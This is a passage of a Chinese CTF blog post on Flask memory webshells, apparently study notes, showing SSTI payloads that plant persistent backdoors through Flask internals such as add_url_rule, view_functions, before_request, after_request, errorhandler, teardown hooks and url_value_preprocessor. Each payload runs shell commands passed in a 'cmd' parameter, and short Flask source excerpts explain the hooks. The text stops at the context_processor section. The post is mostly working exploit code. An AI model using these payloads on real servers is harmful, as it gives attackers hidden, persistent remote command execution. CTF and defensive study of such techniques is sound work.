<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="google-site-verification" content="FVeTimbT1kTEtyy7CZnjl87tv6Zu3gYnjspaqbsrZ6M" />
    <meta name="baidu-site-verification" content="codeva-4fIoJmJzzi" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="打ctf的时候遇到很多flask打ssti，遇到没有回显时，往往除了覆盖加盲注就不知道怎么弄了，今天来学习下其他师傅发现的内存马。记录一下当作笔记。 低版本内存马在flask中，没有定义的路由会返回404的，因此内存马最初是通过动态注册路由来实现的。 1&#123;&#123;url_for.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&amp;#x27">
<meta property="og:type" content="article">
<meta property="og:title" content="内存马">
<meta property="og:url" content="https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/index.html">
<meta property="og:site_name" content="Oceanzbz&#39;s Blog">
<meta property="og:description" content="打ctf的时候遇到很多flask打ssti，遇到没有回显时，往往除了覆盖加盲注就不知道怎么弄了，今天来学习下其他师傅发现的内存马。记录一下当作笔记。 低版本内存马在flask中，没有定义的路由会返回404的，因此内存马最初是通过动态注册路由来实现的。 1&#123;&#123;url_for.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&amp;#x27">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-02-24T11:05:16.000Z">
<meta property="article:modified_time" content="2025-05-09T16:28:36.720Z">
<meta property="article:author" content="Oceanzbz">
<meta property="article:tag" content="内存马">
<meta property="article:tag" content="Python安全">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>内存马</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-QWTJSPQL4F"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-QWTJSPQL4F');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/atom.xml" title="Oceanzbz&#39;s Blog" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/link/">Friends</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/02/26/CTF/%E5%88%B7%E9%A2%98/BUUCTF%E5%88%B7%E9%A2%98/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/02/17/%E6%94%BB%E9%98%B2%E6%B8%97%E9%80%8F/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C/Initial/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&text=内存马"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&is_video=false&description=内存马"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=内存马&body=Check out this article: https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&title=内存马"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&name=内存马&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://oceanzbz.github.io/2025/02/24/Python%E5%AE%89%E5%85%A8/%E5%86%85%E5%AD%98%E9%A9%AC/&t=内存马"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%8E%E7%89%88%E6%9C%AC%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">1.</span> <span class="toc-text">低版本内存马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B0%E7%89%88%E6%9C%AC%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">2.</span> <span class="toc-text">新版本内存马</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#add-url-rule-%E7%BB%95%E8%BF%87"><span class="toc-number">2.1.</span> <span class="toc-text">add_url_rule 绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#before-request"><span class="toc-number">2.2.</span> <span class="toc-text">before_request</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#after-request"><span class="toc-number">2.3.</span> <span class="toc-text">after_request</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#endpoint"><span class="toc-number">2.4.</span> <span class="toc-text">endpoint</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#errorhandler"><span class="toc-number">2.5.</span> <span class="toc-text">errorhandler</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#teardown-request"><span class="toc-number">2.6.</span> <span class="toc-text">teardown_request</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#teardown-appcontext"><span class="toc-number">2.7.</span> <span class="toc-text">teardown_appcontext</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#url-value-preprocessor"><span class="toc-number">2.8.</span> <span class="toc-text">url_value_preprocessor</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#context-processor"><span class="toc-number">2.9.</span> <span class="toc-text">context_processor</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sanic%E6%A1%86%E6%9E%B6%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">3.</span> <span class="toc-text">sanic框架内存马</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#add-route"><span class="toc-number">3.1.</span> <span class="toc-text">add_route</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exception"><span class="toc-number">3.2.</span> <span class="toc-text">exception</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8A%84%E6%9D%A5%E7%9A%84%E5%A7%BF%E5%8A%BF"><span class="toc-number">4.</span> <span class="toc-text">抄来的姿势</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%AD%97%E6%AF%8D%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">4.1.</span> <span class="toc-text">无字母内存马</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%97%A0%E5%AD%97%E6%AF%8D%E5%BC%B9shell"><span class="toc-number">4.2.</span> <span class="toc-text">无字母弹shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87-Undefined-%E6%8B%BF-globals"><span class="toc-number">4.3.</span> <span class="toc-text">通过 Undefined 拿 globals</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96-flask-request-%E5%AF%B9%E8%B1%A1"><span class="toc-number">4.4.</span> <span class="toc-text">获取 flask.request 对象</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%89%93%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">4.5.</span> <span class="toc-text">pickle反序列化打内存马</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#before-request-1"><span class="toc-number">4.5.1.</span> <span class="toc-text">before_request</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#after-request-1"><span class="toc-number">4.5.2.</span> <span class="toc-text">after_request</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#errorhandler-1"><span class="toc-number">4.5.3.</span> <span class="toc-text">errorhandler</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        内存马
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Oceanzbz</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-02-24T11:05:16.000Z" class="dt-published" itemprop="datePublished">2025-02-24</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/CTF/"> CTF</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/CTF/" rel="tag">CTF</a>, <a class="p-category" href="/tags/Python%E5%AE%89%E5%85%A8/" rel="tag">Python安全</a>, <a class="p-category" href="/tags/%E5%86%85%E5%AD%98%E9%A9%AC/" rel="tag">内存马</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>打ctf的时候遇到很多flask打ssti，遇到没有回显时，往往除了覆盖加盲注就不知道怎么弄了，今天来学习下其他师傅发现的内存马。记录一下当作笔记。</p>
<h2 id="低版本内存马"><a href="#低版本内存马" class="headerlink" title="低版本内存马"></a>低版本内存马</h2><p>在flask中，没有定义的路由会返回404的，因此内存马最初是通过动态注册路由来实现的。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, lambda :__import__(&#x27;os&#x27;).popen(_request_ctx_stack.top.request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;)).read())&quot;</span>,&#123;<span class="string">&#x27;_request_ctx_stack&#x27;</span>:url_for.__globals__[<span class="string">&#x27;_request_ctx_stack&#x27;</span>],<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=&#123;&#123;x.__init__.__globals__.__getitem__(<span class="string">&#x27;__builtins__&#x27;</span>).__getitem__(<span class="string">&#x27;exec&#x27;</span>)(<span class="string">&quot;setattr(__import__(&#x27;sys&#x27;).modules.__getitem__(&#x27;__main__&#x27;).__dict__.__getitem__(&#x27;app&#x27;),&#x27;_got_first_request&#x27;,False);__import__(&#x27;sys&#x27;).modules.__getitem__(&#x27;__main__&#x27;).__dict__.__getitem__(&#x27;app&#x27;).add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, lambda: &#x27;&lt;pre&gt;&#123;0&#125;&lt;/pre&gt;&#x27;.format(__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read()))&quot;</span>)&#125;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="新版本内存马"><a href="#新版本内存马" class="headerlink" title="新版本内存马"></a>新版本内存马</h2><h3 id="add-url-rule-绕过"><a href="#add-url-rule-绕过" class="headerlink" title="add_url_rule 绕过"></a>add_url_rule 绕过</h3><p>首先构造第一条请求向 <code>url_map</code> 中新增一条 <code>UrlRule</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>]( <span class="string">&quot;app.url_map.add( app.url_rule_class(&#x27;/shell&#x27;, methods=[&#x27;GET&#x27;], endpoint=&#x27;shell&#x27;) )&quot;</span>, &#123; <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>] &#125; )</span><br></pre></td></tr></table></figure>

<p>此时访问 &#x2F;shell 不会报 404 了，也就是说我们成功将 “&#x2F;shell” 添加到了路由表，但是由于并未添加 <code>view_function[endpoint]</code>，会报 KeyError 错误,然后构造第二条请求向 <code>view_function</code> 中添加对应 <code>endpoint</code> 的实现</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>]( <span class="string">&quot;app.view_functions.update( &#123; &#x27;shell&#x27;: lambda:__import__(&#x27;os&#x27;).popen( app.request_context.__globals__[&#x27;request_ctx&#x27;].request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;) ).read() &#125; )&quot;</span>, &#123; <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>] &#125; )</span><br></pre></td></tr></table></figure>


<h3 id="before-request"><a href="#before-request" class="headerlink" title="before_request"></a>before_request</h3><p>先来看一下这个装饰器的实现</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@setupmethod</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">before_request</span>(<span class="params">self, f: BeforeRequestCallable</span>) -&gt; BeforeRequestCallable:</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    在每次请求之前，调用自定义的函数f</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    <span class="variable language_">self</span>.before_request_funcs.setdefault(<span class="literal">None</span>, []).append(f)</span><br><span class="line">    <span class="keyword">return</span> f</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里，如果 None 键不存在，就初始化为一个空列表。如果存在传入的函数 f，则通过调用<code>before_request_funcs.setdefault(None, []).append(f)</code>函数把自定义函数f添加到before_request_funcs 字典中，在每次请求处理之前调用这个函，所以如果我们如果注入进去一个函数，就会在每次请求的时候就会调用我们注入的函数。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">eval</span>(<span class="string">&quot;__import__(&#x27;sys&#x27;).modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].before_request_funcs.setdefault(None,[]).append(lambda: &#x27;&lt;pre&gt;&#123;0&#125;&lt;/pre&gt;&#x27;.format(__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read()&quot;</span>)</span><br></pre></td></tr></table></figure>

<h3 id="after-request"><a href="#after-request" class="headerlink" title="after_request"></a>after_request</h3><p><code>after_request</code>装饰器在每次请求处理之后调用，同样可以接收一个自定义函数f，区别在，这里的函数需要接收一个response对象，同时返回一个response对象</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@setupmethod</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">after_request</span>(<span class="params">self, f: AfterRequestCallable</span>) -&gt; AfterRequestCallable:</span><br><span class="line">        <span class="string">&quot;&quot;&quot;注册一个函数，在每次请求后运行。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        该函数会接收响应对象，并必须返回一个响应对象。这允许函数在发送响应之前修改或替换响应。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">        如果一个函数引发异常，则任何剩余的 ``after_request`` 函数将不会被调用。因此，这不应用于必须执行的操作，例如关闭资源。请使用 :meth:`teardown_request` 来处理此类操作。</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span></span><br><span class="line">        <span class="variable language_">self</span>.after_request_funcs.setdefault(<span class="literal">None</span>, []).append(f)</span><br><span class="line">        <span class="keyword">return</span> f</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>和before_request很像，不过lambda无法对原始传进来的response进行修改后再返回，所以需要重新生成一个response对象，然后再返回这个response。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">lambda</span> resp: <span class="comment">#传入参数</span></span><br><span class="line">    CmdResp <span class="keyword">if</span> request.args.get(<span class="string">&#x27;cmd&#x27;</span>) <span class="keyword">and</span>      <span class="comment">#如果请求参数含有cmd则返回命令执行结果</span></span><br><span class="line">    <span class="built_in">exec</span>(<span class="string">&#x27;</span></span><br><span class="line"><span class="string">        global CmdResp;     #定义一个全局变量，方便获取</span></span><br><span class="line"><span class="string">        CmdResp=make_response(os.popen(request.args.get(\&#x27;cmd\&#x27;)).read())   #创建一个响应对象</span></span><br><span class="line"><span class="string">    &#x27;</span>)==<span class="literal">None</span>    <span class="comment">#exec函数返回None，所以恒真</span></span><br><span class="line">    <span class="keyword">else</span> resp)  <span class="comment">#如果请求参数没有cmd则正常返回</span></span><br><span class="line"><span class="comment">#这里的cmd参数名和CmdResp变量名都是可以改的，最好改成服务中不存在的变量名以免影响正常业务</span></span><br></pre></td></tr></table></figure>

<p>ssti</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get(&#x27;cmd&#x27;) and exec(\&quot;global CmdResp;CmdResp=__import__(\&#x27;flask\&#x27;).make_response(__import__(\&#x27;os\&#x27;).popen(request.args.get(\&#x27;cmd\&#x27;)).read())\&quot;)==None else resp)&quot;</span>,&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>],<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)&#125;&#125;&amp;cmd=whoami</span><br></pre></td></tr></table></figure>


<h3 id="endpoint"><a href="#endpoint" class="headerlink" title="endpoint"></a>endpoint</h3><p>在 Flask 中，**<code>endpoint</code>** 是路由系统中的一个非常重要的概念，它代表了每个注册的 URL 路由的名称或标识符。<code>endpoint</code> 通过 Flask 的路由系统将 URL 和视图函数关联起来，可以用来构建 URL 或在应用程序的某些部分引用特定的视图函数。Flask 在为视图函数注册 URL 路由时，会自动将视图函数的名字作为该路由的 <code>endpoint</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](  </span><br><span class="line"><span class="string">&quot;  </span></span><br><span class="line"><span class="string">app.backup_func=app.view_functions[&#x27;hello_endpoint&#x27;];  </span></span><br><span class="line"><span class="string">app.view_functions[&#x27;hello_endpoint&#x27;]=lambda : __import__(&#x27;os&#x27;).popen(reques  </span></span><br><span class="line"><span class="string">t.args.get(&#x27;cmd&#x27;)).read() if &#x27;cmd&#x27; in request.args.keys() is not None else  </span></span><br><span class="line"><span class="string">app.backup_func()  </span></span><br><span class="line"><span class="string">&quot;</span>,  </span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;curre  </span></span><br><span class="line"><span class="string">nt_app&#x27;</span>]&#125;) &#125;&#125;  </span><br><span class="line">app.view_functions[<span class="string">&#x27;hello_endpoint&#x27;</span>]=<span class="keyword">lambda</span> : <span class="built_in">__import__</span>(<span class="string">&#x27;os&#x27;</span>).popen(reques  </span><br><span class="line">t.args.get(request.args.get(<span class="string">&#x27;cmd&#x27;</span>))).read()</span><br></pre></td></tr></table></figure>

<h3 id="errorhandler"><a href="#errorhandler" class="headerlink" title="errorhandler"></a>errorhandler</h3><p>这个函数可以用于自定义404页面的回显</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exec</span>(<span class="string">&quot;global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;gxngxngxn&#x27;)).read()&quot;</span>)</span><br></pre></td></tr></table></figure>
<h3 id="teardown-request"><a href="#teardown-request" class="headerlink" title="teardown_request"></a>teardown_request</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@setupmethod</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">teardown_request</span>(<span class="params">self, f: TeardownCallable</span>) -&gt; TeardownCallable:</span><br><span class="line">        <span class="variable language_">self</span>.teardown_request_funcs.setdefault(<span class="literal">None</span>, []).append(f)</span><br><span class="line">        <span class="keyword">return</span> f</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><code>teardown_request</code>装饰器在每次请求处理之后调用，同样可以接收一个自定义函数f，在后台运行，没有回显，可以写文件，出网反弹shell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].teardown_request_funcs.setdefault(None, []).append(lambda error: __import__(&#x27;os&#x27;).popen(__import__(&#x27;flask&#x27;).request.args.get(&#x27;cmd&#x27;)).read())&quot;</span>)&#125;&#125;&amp;cmd=echo <span class="number">11111</span> &gt; <span class="number">1.</span>txt</span><br></pre></td></tr></table></figure>

<h3 id="teardown-appcontext"><a href="#teardown-appcontext" class="headerlink" title="teardown_appcontext"></a>teardown_appcontext</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@setupmethod</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">teardown_appcontext</span>(<span class="params">self, f: TeardownCallable</span>) -&gt; TeardownCallable:</span><br><span class="line">        <span class="variable language_">self</span>.teardown_appcontext_funcs.append(f)</span><br><span class="line">        <span class="keyword">return</span> f</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>不能接收get动态传参，可以写文件，出网反弹shell</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].teardown_appcontext_funcs.append(lambda error: __import__(&#x27;os&#x27;).popen(&#x27;echo 2222 &gt; 1.txt&#x27;).read())&quot;</span>)&#125;&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="url-value-preprocessor"><a href="#url-value-preprocessor" class="headerlink" title="url_value_preprocessor"></a>url_value_preprocessor</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](  </span><br><span class="line"><span class="string">&quot;  </span></span><br><span class="line"><span class="string">app.url_value_preprocessors[None].append(lambda ep, args : __import__(&#x27;os&#x27;)  </span></span><br><span class="line"><span class="string">.popen(request.args.get(&#x27;cmd&#x27;)) if &#x27;cmd&#x27; in request.args.keys() else None)  </span></span><br><span class="line"><span class="string">&quot;</span>,  </span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;curre  </span></span><br><span class="line"><span class="string">nt_app&#x27;</span>]&#125;) &#125;&#125;</span><br></pre></td></tr></table></figure>

<h3 id="context-processor"><a href="#context-processor" class="headerlink" title="context_processor"></a>context_processor</h3><p>先用下面的 payload 将 <code>os.popen(...).read()</code> 的返回值赋给 <code>cmd</code></p>
